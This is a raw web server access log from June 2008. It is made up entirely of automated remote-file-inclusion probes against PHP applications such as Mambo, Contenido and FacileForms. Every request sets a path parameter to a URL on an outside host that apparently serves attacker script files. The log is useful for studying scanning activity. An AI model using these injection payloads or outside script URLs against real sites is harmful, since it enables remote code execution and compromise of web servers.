64.106.202.240 - - [29/Jun/2008:17:50:05 -0600] "GET /logs/access_log.20080420//?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
221.139.104.33 - - [29/Jun/2008:17:50:09 -0600] "GET /logs/access_log/lostpasswd.php?env[include_prefix]=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
221.139.104.33 - - [29/Jun/2008:17:50:19 -0600] "GET /logs/access_log/lostpasswd.php?env[include_prefix]=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
74.63.2.169 - - [29/Jun/2008:17:50:58 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.812"
74.63.2.169 - - [29/Jun/2008:17:50:59 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.812"
74.63.2.169 - - [29/Jun/2008:17:50:59 -0600] "GET /logs/error_log.20080413//admin/business_inc/saveserver.php?thisdir=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.812"
74.63.2.169 - - [29/Jun/2008:17:51:05 -0600] "GET /logs/error_log.20080420//admin/business_inc/saveserver.php?thisdir=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.812"
67.18.151.242 - - [29/Jun/2008:17:51:43 -0600] "GET /logs/access_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.18.151.242 - - [29/Jun/2008:17:51:44 -0600] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.6.155.114 - - [29/Jun/2008:17:51:44 -0600] "GET /logs/access_log//?mosConfig_absolute_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 223 "-" "libwww-perl/5.810"
74.63.2.169 - - [29/Jun/2008:17:51:51 -0600] "GET /logs/access_log/index.php?site=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.812"
74.63.2.169 - - [29/Jun/2008:17:51:51 -0600] "GET /logs/index.php?site=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.812"
74.63.2.169 - - [29/Jun/2008:17:51:52 -0600] "GET /index.php?site=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.812"
200.6.155.114 - - [29/Jun/2008:17:51:52 -0600] "GET //?mosConfig_absolute_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 200 698 "-" "libwww-perl/5.810"
212.227.251.172 - - [29/Jun/2008:17:51:56 -0600] "GET /index.php?conteudo=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
200.6.155.114 - - [29/Jun/2008:17:52:01 -0600] "GET /logs//?mosConfig_absolute_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 200 4297 "-" "libwww-perl/5.810"
67.18.151.242 - - [29/Jun/2008:17:52:25 -0600] "GET /logs/error_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 289 "-" "libwww-perl/5.810"
67.18.151.242 - - [29/Jun/2008:17:52:25 -0600] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.810"
67.18.151.242 - - [29/Jun/2008:17:52:25 -0600] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.810"
67.18.151.242 - - [29/Jun/2008:17:52:25 -0600] "GET /logs/access_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.810"
209.62.118.242 - - [29/Jun/2008:17:52:33 -0600] "GET /logs/access_log//includes/ktedit/toolbar.php?dirDepth=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
209.62.118.242 - - [29/Jun/2008:17:52:33 -0600] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
209.62.118.242 - - [29/Jun/2008:17:52:33 -0600] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 239 "-" "libwww-perl/5.812"
209.62.118.242 - - [29/Jun/2008:17:52:35 -0600] "GET /logs/error_log//includes/ktedit/toolbar.php?dirDepth=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 249 "-" "libwww-perl/5.812"
61.222.167.228 - - [29/Jun/2008:17:52:40 -0600] "GET /logs/access_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
61.222.167.228 - - [29/Jun/2008:17:52:43 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
61.222.167.228 - - [29/Jun/2008:17:52:45 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
89.108.91.166 - - [29/Jun/2008:17:53:16 -0600] "GET /logs/error_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:53:16 -0600] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:53:17 -0600] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:53:17 -0600] "GET /logs/access_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.803"
195.34.78.106 - - [29/Jun/2008:17:53:20 -0600] "GET /logs/access_log.20080420//includes/header.php?c_temp_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
195.34.78.106 - - [29/Jun/2008:17:53:20 -0600] "GET /logs//includes/header.php?c_temp_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
89.108.91.166 - - [29/Jun/2008:17:53:21 -0600] "GET /logs/error_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:53:22 -0600] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:53:22 -0600] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:53:23 -0600] "GET /logs/access_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.803"
209.62.118.242 - - [29/Jun/2008:17:53:24 -0600] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
195.34.78.106 - - [29/Jun/2008:17:53:28 -0600] "GET /logs/error_log.20080420//includes/header.php?c_temp_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
89.108.91.166 - - [29/Jun/2008:17:53:30 -0600] "GET /logs/error_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:53:30 -0600] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:53:31 -0600] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:53:31 -0600] "GET /logs/access_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.803"
67.18.151.242 - - [29/Jun/2008:17:53:47 -0600] "GET /logs/access_log.20080330//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.810"
67.18.151.242 - - [29/Jun/2008:17:53:47 -0600] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
67.18.151.242 - - [29/Jun/2008:17:53:47 -0600] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.810"
189.19.255.240 - - [29/Jun/2008:17:53:50 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
61.222.167.228 - - [29/Jun/2008:17:54:18 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
202.221.143.111 - - [29/Jun/2008:17:54:56 -0600] "GET /logs/error_log.20080420//includes/header.php?c_temp_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
202.221.143.111 - - [29/Jun/2008:17:54:56 -0600] "GET /logs//includes/header.php?c_temp_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
202.221.143.111 - - [29/Jun/2008:17:54:57 -0600] "GET /logs/access_log.20080420//includes/header.php?c_temp_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
67.18.151.242 - - [29/Jun/2008:17:55:20 -0600] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
89.108.91.166 - - [29/Jun/2008:17:55:25 -0600] "GET /logs/access_log.20080330//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:55:25 -0600] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:55:26 -0600] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:55:29 -0600] "GET /logs/access_log.20080330//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:55:29 -0600] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:55:30 -0600] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
201.130.79.28 - - [29/Jun/2008:17:55:39 -0600] "GET /logs/access_log.20080330//include/write.php?dir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
201.130.79.28 - - [29/Jun/2008:17:55:39 -0600] "GET //include/write.php?dir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.65"
201.130.79.28 - - [29/Jun/2008:17:55:39 -0600] "GET /logs//include/write.php?dir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.65"
89.108.91.166 - - [29/Jun/2008:17:55:40 -0600] "GET /logs/access_log.20080330//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:55:40 -0600] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:55:41 -0600] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
201.130.79.28 - - [29/Jun/2008:17:55:41 -0600] "GET /logs/access_log//include/write.php?dir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
205.234.215.105 - - [29/Jun/2008:17:55:41 -0600] "GET /logs/error_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 289 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:55:42 -0600] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:55:42 -0600] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:55:42 -0600] "GET /logs/access_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:55:43 -0600] "GET /logs/error_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 289 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:55:43 -0600] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:55:44 -0600] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:55:44 -0600] "GET /logs/access_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.811"
67.18.151.242 - - [29/Jun/2008:17:56:03 -0600] "GET /logs/access_log.20080601//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.810"
207.58.128.201 - - [29/Jun/2008:17:57:01 -0600] "GET /logs/access_log/main.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
207.58.128.201 - - [29/Jun/2008:17:57:01 -0600] "GET /main.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.810"
207.58.128.201 - - [29/Jun/2008:17:57:01 -0600] "GET /logs/main.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
217.20.163.130 - - [29/Jun/2008:17:57:08 -0600] "GET /logs/error_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 289 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:17:57:08 -0600] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:17:57:09 -0600] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:17:57:09 -0600] "GET /logs/access_log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.65"
59.106.20.28 - - [29/Jun/2008:17:57:25 -0600] "GET /logs/access_log/main.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
59.106.20.28 - - [29/Jun/2008:17:57:26 -0600] "GET /main.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
59.106.20.28 - - [29/Jun/2008:17:57:26 -0600] "GET /logs/main.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
89.108.91.166 - - [29/Jun/2008:17:57:37 -0600] "GET /logs/access_log.20080601//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
89.108.91.166 - - [29/Jun/2008:17:57:39 -0600] "GET /logs/access_log.20080601//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
207.58.128.201 - - [29/Jun/2008:17:57:41 -0600] "GET /logs/access_log.20080420/main.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
89.108.91.166 - - [29/Jun/2008:17:57:53 -0600] "GET /logs/access_log.20080601//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
205.234.215.105 - - [29/Jun/2008:17:58:10 -0600] "GET /logs/access_log.20080330//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:58:10 -0600] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:58:10 -0600] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:58:14 -0600] "GET /logs/access_log.20080330//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:58:14 -0600] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:17:58:14 -0600] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
74.52.231.162 - - [29/Jun/2008:17:58:21 -0600] "GET /logs/access_log.20080330//include/write.php?dir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
74.52.231.162 - - [29/Jun/2008:17:58:21 -0600] "GET //include/write.php?dir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
74.52.231.162 - - [29/Jun/2008:17:58:21 -0600] "GET /logs//include/write.php?dir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.811"
74.52.231.162 - - [29/Jun/2008:17:58:32 -0600] "GET /logs/access_log//include/write.php?dir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
195.90.15.14 - - [29/Jun/2008:17:58:36 -0600] "GET /logs/access_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 285 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.90.15.14 - - [29/Jun/2008:17:58:36 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.74.196.90 - - [29/Jun/2008:17:58:39 -0600] "GET /logs/access_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 285 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.74.196.90 - - [29/Jun/2008:17:58:39 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.18.151.242 - - [29/Jun/2008:17:58:39 -0600] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.810"
77.74.196.90 - - [29/Jun/2008:17:58:52 -0600] "GET /logs/access_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:17:58:52 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:17:58:53 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
59.106.20.28 - - [29/Jun/2008:17:58:58 -0600] "GET /logs/access_log.20080420/main.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
61.222.167.228 - - [29/Jun/2008:17:59:05 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
193.202.88.113 - - [29/Jun/2008:17:59:14 -0600] "GET /logs/access_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 285 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.202.88.113 - - [29/Jun/2008:17:59:15 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.188.110.30 - - [29/Jun/2008:17:59:20 -0600] "GET /logs/access_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
89.188.110.30 - - [29/Jun/2008:17:59:20 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
89.188.110.30 - - [29/Jun/2008:17:59:20 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
200.203.122.236 - - [29/Jun/2008:17:59:22 -0600] "GET //?mosConfig_absolute_path=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.805"
89.188.110.30 - - [29/Jun/2008:17:59:23 -0600] "GET /logs/access_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 285 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.188.110.30 - - [29/Jun/2008:17:59:23 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.90.15.14 - - [29/Jun/2008:17:59:24 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 284 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
205.234.215.105 - - [29/Jun/2008:17:59:24 -0600] "GET /logs/access_log.20080601//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:17:59:25 -0600] "GET /logs/error_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 284 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
205.234.215.105 - - [29/Jun/2008:17:59:26 -0600] "GET /logs/access_log.20080601//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.811"
77.221.157.210 - - [29/Jun/2008:17:59:28 -0600] "GET /logs/access_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
77.221.157.210 - - [29/Jun/2008:17:59:28 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
77.221.157.210 - - [29/Jun/2008:17:59:29 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
193.202.88.113 - - [29/Jun/2008:17:59:33 -0600] "GET /logs/access_log.20080608//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.811"
